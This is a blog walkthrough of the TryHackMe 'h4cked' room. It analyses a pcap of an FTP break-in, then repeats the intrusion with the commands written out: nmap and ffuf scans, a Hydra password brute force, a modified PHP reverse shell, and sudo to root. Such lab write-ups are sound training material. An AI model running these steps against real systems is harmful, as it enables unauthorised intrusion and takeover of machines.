h4cked — TryHackMe

h4cked-THM

Find out what happened by analyzing a .pcap file and hack your way back into the machine.This is a beginner's friendly room and can be found here:

https://tryhackme.com/room/h4cked

The attacker is trying to log into a specific service. What service is this?

Open WireShark and notice that service which the attacker is trying to login in to is FTP.Now do the following to the the username and password asked in later questions.Select the first FTP packet->right click, Follow->TCP Stream.

wireshark ftp

There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?

Hydra

The attacker is trying to log on with a specific username. What is the username?

Answered above

What is the user’s password?

Answered above

What is the current FTP working directory after the attacker logged in?

Clear the filter which was applied earlier and got to packet number 401 which is just after the successful FTP login.This packet will show the current FTP working directory.

wireshark

The attacker uploaded a backdoor. What is the backdoor’s filename?

Check packet no. 425 in Capture.pcapng

The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?

A famous php shell from pentest monkey. Check packet no. 431.

Which command did the attacker manually execute after getting a reverse shell?

Select packet no. 452 and right click->Follow->TCPStream. This will reveal what the attacker was doing on the target after getting the shell.

This will also tell us the computer’s hostname,command the attacker executed to spawn a new TTY shell, command executed to gain a root shell and what attacker downloaded from GitHub.

The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?

Browse to the GitHub project found the last question and the about section will gives us the type of the backdoor that was used.

Hack your way back into the machine

Run a quick NMAP scan to check what services are running on the target:

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 10.10.43.233
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

So 2 services are running.Now the attacker has changed the user’s password! We need to replicate the attacker’s steps and read the flag.txt. The flag is located in the /root/Reptile directory.

First Brute force directories and files on port 80 using ffuf:

┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://10.10.43.233/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.2.1
________________________________________________
:: Method : GET
:: URL : http://10.10.43.233/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376]
shell.php [Status: 200, Size: 143, Words: 20, Lines: 3]
.html [Status: 403, Size: 277, Words: 20, Lines: 10]
.php [Status: 403, Size: 277, Words: 20, Lines: 10]
[Status: 200, Size: 10918, Words: 3499, Lines: 376]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 1854 req/sec :: Duration: [0:09:13] :: Errors: 0 ::

We can see shell.php. This help us to do RCE on the server. Now use Hydra to brute force the FTP login password for user “jenny”:

hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://10.10.43.233

hydra ftp

Hydra found it very quickly in rockyou.txt. Login on the target via ftp using the credentials we now know:

ftp

As shell.php got read,write and execute permissions for everyone, “get” shell.php on to the local machine and edit it with the IP Address of the local machine and port of your choice so that we get a reverse shell back.”Put” the file back. Execute shell.php via the browser, after starting a netcat listener on our local machine :

execute shell.php

We got our reverse shell:

reverse shell

Run the following to upgrade the current shell:

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

Switch use to jenny using the same password which we found using hydra:

su jenny

Check what jenny can run as other user using,again use the same password:

sudo -l

sudo -l

User jenny as run any command as root, so just use sudo su to get root:

privilege escalation

Find the root flag at /root/Reptile/flag.txt

That’s it. Thanks for reading.

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} Classic Car Stunts 2019 Hack Free Resources Generator

Hack The Box Shocker Write-Up (Without Metasploit)

How to be secure on the internet.

The True Cost of Social Media is Your Privacy

Ten lockdown videos

TIL Password Security

What happens when you leak credentials on GitHub? An exploit experiment

Spy Alert! Reolink products have a security hole

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

TryHackMe: Internal walkthrough

HackFridays with Cyrex

Zero Logon — CyberDefense Walkthrough

picoCTF 2022: Cryptography writeups